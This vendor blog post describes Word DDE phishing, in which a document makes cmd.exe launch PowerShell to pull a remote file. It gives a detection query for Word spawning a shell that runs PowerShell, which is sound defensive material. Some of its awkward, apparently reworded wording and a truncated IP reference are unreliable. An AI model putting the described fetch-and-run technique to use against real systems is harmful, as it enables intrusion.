Charles Leaver – New Microsoft Word Feature Can Mean Phishing Attacks

Written By Josh Harriman And Presented By Charles Leaver


An interesting multifaceted attack has been reported in a current blog post by Cisco’s Talos Intelligence team. I wanted to discuss the infection vector of this attack as it’s quite interesting and something that Microsoft has actually pledged not to fix, as it is a function and not a bug. Reports are can be found about attacks in the wild which are making use of a function in Microsoft Word, called Dynamic Data Exchange (DDE). Information to how this is accomplished are reported in this blog from SecureData.

Distinct Phishing Attack with Microsoft Word

Attackers constantly search for brand-new methods to breach an organization. Phishing attacks are one of the most common as opponents are relying on that somebody will either open a document sent out to them or go to a ‘fabricated’ URL. From there an exploit on a vulnerable piece of code generally gives them access to start their attack.

But in this case, the documents didn’t have a malicious thing embedded in the Word doc, which is a favorite attack vector, however rather a sly way of using this function that enables the Word program to connect out to obtain the real destructive files. By doing this they could hope or count on a much better success rate of infection as malicious Word files themselves can be scanned and erased before getting to the recipient.

Hunting for Suspicious Habits with Ziften Zenith

Here at Ziften, we wanted to be able to signal on this habit for our clients. Finding conditions that exhibit ‘strange’ habits such as Microsoft Word generating a shell is interesting and not anticipated. Taking it a bit further and searching for PowerShell running from that generated shell and it gets ‘very’ fascinating. By using our Search API, we can find these behaviors no matter when they occurred. We do not need the system to be on at the time of the search, if they have actually run a program (i.e. Word) that showed these habits, we can discover that system. Ziften is always gathering and sending relevant process details which is why we can discover the data without depending on the system state at the time of browsing.

In our Zenith console, I searched for this condition by looking for the following:

Process → Filepath contains word.exe, Child Process Filepath contains cmd.exe, Child Process commandline includes powershell

This returns the PIDs (Process ID) of the procedures we saw startup with these conditions. From there we can drill down to see the nitty gritty details.

In this very first screenshot, we can see details around the process tree (Word spawning CMD with Powershell under that) to the left, and to the right side you can observe information such as the System name and User, plus start time.

Below in the next image, we look at the CMD procedure and get details as to exactly what was passed to Powershell.

Probably when the user needed to answer this Microsoft Word pop-up dialog box, that is when the CMD shell utilized Powershell to head out and get some code hosted on the Louisiana Gov website. In the Powershell image below we can see more information such as Network Connect details when it was connecting to the website to pull the fonts.txt file.

That IP address ( is in fact the Louisiana Gov site. In some cases we see intriguing data within our Network Connect information that might not match exactly what you anticipate.

After producing our Saved Search, we can notify on these conditions as they take place throughout the environment. We can likewise create extensions that change a GPO policy to not permit DDE and even take additional action and go and find these documents and eliminate them from the system if so desired. Having the ability to discover fascinating combinations of conditions within an environment is really powerful and we are very proud to have this feature in our product.